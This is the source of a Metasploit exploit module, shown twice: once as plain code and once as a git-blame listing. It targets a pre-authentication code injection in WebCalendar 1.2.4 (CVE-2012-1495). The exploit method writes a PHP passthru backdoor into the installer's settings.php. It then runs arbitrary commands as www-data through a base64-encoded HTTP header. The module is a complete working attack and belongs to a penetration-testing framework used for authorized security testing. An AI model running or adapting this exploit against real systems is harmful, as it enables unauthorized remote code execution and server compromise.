modules/exploits/linux/http/webcalendar_settings_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "WebCalendar 1.2.4 Pre-Auth Remote Code Injection",
        'Description' => %q{
          This module exploits a vulnerability found in k5n.us WebCalendar, version 1.2.4 or
          less.  If not removed, the settings.php script meant for installation can be
          update by an attacker, and then inject code in it.  This allows arbitrary code
          execution as www-data.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'EgiX', # Initial discovery & PoC
          'sinn3r' # Metasploit
        ],
        'References' => [
          ['CVE', '2012-1495'],
          ['OSVDB', '81329'],
          ['EDB', '18775']
        ],
        'Arch' => ARCH_CMD,
        'Platform' => %w{linux unix},
        'Compat' => {
          'PayloadType' => 'cmd'
        },
        'Targets' => [
          ['WebCalendar 1.2.4 on Linux', {}],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2012-04-23',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI path to webcalendar', '/WebCalendar-1.2.4/'])
      ]
    )
  end

  def check
    uri = normalize_uri(target_uri.path)
    uri << '/' if uri[-1, 1] != '/'

    res = send_request_raw({
      'method' => 'GET',
      'uri' => "#{uri}/login.php"
    })

    if res and res.body =~ /WebCalendar v1\.2\.\d/
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    peer = "#{rhost}:#{rport}"

    uri = target_uri.path

    print_status("Housing php payload...")

    # Allow commands to be passed as a header.
    # We use 'data' instead of 'vars_post to avoid the MSF API escapeing our stuff.
    post_data = "app_settings=1"
    post_data << "&form_user_inc=user.php"
    post_data << "&form_single_user_login=*/print(____);passthru(base64_decode($_SERVER[HTTP_CMD]));die;"
    post_data << "\n" * 2
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(uri, 'install/index.php'),
      'data' => post_data
    })

    print_status("Loading our payload...")

    # Execute our payload
    send_request_raw({
      'method' => 'GET',
      'uri' => normalize_uri(uri, 'includes/settings.php'),
      'headers' => {
        'Cmd' => Rex::Text.encode_base64(payload.encoded)
      }
    })

    handler
  end
end
Add CVE-2012-1495 WebCalendar settings.php code injection 2012-04-28 02:32:04 -05:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Add CVE-2012-1495 WebCalendar settings.php code injection 2012-04-28 02:32:04 -05:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Add CVE-2012-1495 WebCalendar settings.php code injection 2012-04-28 02:32:04 -05:00			`Rank = ExcellentRanking`
Retab modules 2013-08-30 16:28:54 -05:00
Add CVE-2012-1495 WebCalendar settings.php code injection 2012-04-28 02:32:04 -05:00			`include Msf::Exploit::Remote::HttpClient`
Retab modules 2013-08-30 16:28:54 -05:00
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`def initialize(info = {})`
			`super(`
			`update_info(`
			`info,`
			`'Name' => "WebCalendar 1.2.4 Pre-Auth Remote Code Injection",`
			`'Description' => %q{`
40% done 2017-08-28 20:17:58 -04:00			`This module exploits a vulnerability found in k5n.us WebCalendar, version 1.2.4 or`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`less. If not removed, the settings.php script meant for installation can be`
			`update by an attacker, and then inject code in it. This allows arbitrary code`
			`execution as www-data.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => [`
			`'EgiX', # Initial discovery & PoC`
			`'sinn3r' # Metasploit`
Add CVE-2012-1495 WebCalendar settings.php code injection 2012-04-28 02:32:04 -05:00			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'References' => [`
Add CVE-2012-1495 WebCalendar settings.php code injection 2012-04-28 02:32:04 -05:00			`['CVE', '2012-1495'],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`['OSVDB', '81329'],`
Correct EDB references 2012-05-19 02:24:29 -05:00			`['EDB', '18775']`
Add CVE-2012-1495 WebCalendar settings.php code injection 2012-04-28 02:32:04 -05:00			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Arch' => ARCH_CMD,`
			`'Platform' => %w{linux unix},`
			`'Compat' => {`
Add CVE-2012-1495 WebCalendar settings.php code injection 2012-04-28 02:32:04 -05:00			`'PayloadType' => 'cmd'`
			`},`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Targets' => [`
Add CVE-2012-1495 WebCalendar settings.php code injection 2012-04-28 02:32:04 -05:00			`['WebCalendar 1.2.4 on Linux', {}],`
			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Privileged' => false,`
			`'DisclosureDate' => '2012-04-23',`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`'DefaultTarget' => 0,`
			`'Notes' => {`
Update info -d markdown 2025-06-23 12:43:46 +01:00			`'Reliability' => UNKNOWN_RELIABILITY,`
			`'Stability' => UNKNOWN_STABILITY,`
			`'SideEffects' => UNKNOWN_SIDE_EFFECTS`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`}`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`)`
			`)`
Retab modules 2013-08-30 16:28:54 -05:00
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`register_options(`
			`[`
			`OptString.new('TARGETURI', [true, 'The URI path to webcalendar', '/WebCalendar-1.2.4/'])`
			`]`
			`)`
Add CVE-2012-1495 WebCalendar settings.php code injection 2012-04-28 02:32:04 -05:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add CVE-2012-1495 WebCalendar settings.php code injection 2012-04-28 02:32:04 -05:00			`def check`
Add normalize_uri to modules that may have 2012-11-08 17:42:48 +01:00			`uri = normalize_uri(target_uri.path)`
Add CVE-2012-1495 WebCalendar settings.php code injection 2012-04-28 02:32:04 -05:00			`uri << '/' if uri[-1, 1] != '/'`
Retab modules 2013-08-30 16:28:54 -05:00
Add CVE-2012-1495 WebCalendar settings.php code injection 2012-04-28 02:32:04 -05:00			`res = send_request_raw({`
			`'method' => 'GET',`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'uri' => "#{uri}/login.php"`
Add CVE-2012-1495 WebCalendar settings.php code injection 2012-04-28 02:32:04 -05:00			`})`
Retab modules 2013-08-30 16:28:54 -05:00
Saving progress 2014-01-21 17:14:55 -06:00			`if res and res.body =~ /WebCalendar v1\.2\.\d/`
			`return Exploit::CheckCode::Appears`
Add CVE-2012-1495 WebCalendar settings.php code injection 2012-04-28 02:32:04 -05:00			`else`
			`return Exploit::CheckCode::Safe`
			`end`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add CVE-2012-1495 WebCalendar settings.php code injection 2012-04-28 02:32:04 -05:00			`def exploit`
			`peer = "#{rhost}:#{rport}"`
Retab modules 2013-08-30 16:28:54 -05:00
Correctly use normalize_uri() 2013-01-30 23:23:41 -06:00			`uri = target_uri.path`
Retab modules 2013-08-30 16:28:54 -05:00
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_status("Housing php payload...")`
Retab modules 2013-08-30 16:28:54 -05:00
Add CVE-2012-1495 WebCalendar settings.php code injection 2012-04-28 02:32:04 -05:00			`# Allow commands to be passed as a header.`
			`# We use 'data' instead of 'vars_post to avoid the MSF API escapeing our stuff.`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`post_data = "app_settings=1"`
Add CVE-2012-1495 WebCalendar settings.php code injection 2012-04-28 02:32:04 -05:00			`post_data << "&form_user_inc=user.php"`
			`post_data << "&form_single_user_login=*/print(____);passthru(base64_decode($_SERVER[HTTP_CMD]));die;"`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`post_data << "\n" * 2`
Add CVE-2012-1495 WebCalendar settings.php code injection 2012-04-28 02:32:04 -05:00			`send_request_cgi({`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'method' => 'POST',`
			`'uri' => normalize_uri(uri, 'install/index.php'),`
			`'data' => post_data`
Add CVE-2012-1495 WebCalendar settings.php code injection 2012-04-28 02:32:04 -05:00			`})`
Retab modules 2013-08-30 16:28:54 -05:00
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_status("Loading our payload...")`
Retab modules 2013-08-30 16:28:54 -05:00
Add CVE-2012-1495 WebCalendar settings.php code injection 2012-04-28 02:32:04 -05:00			`# Execute our payload`
			`send_request_raw({`
			`'method' => 'GET',`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'uri' => normalize_uri(uri, 'includes/settings.php'),`
Add CVE-2012-1495 WebCalendar settings.php code injection 2012-04-28 02:32:04 -05:00			`'headers' => {`
			`'Cmd' => Rex::Text.encode_base64(payload.encoded)`
			`}`
			`})`
Retab modules 2013-08-30 16:28:54 -05:00
Add CVE-2012-1495 WebCalendar settings.php code injection 2012-04-28 02:32:04 -05:00			`handler`
			`end`
			`end`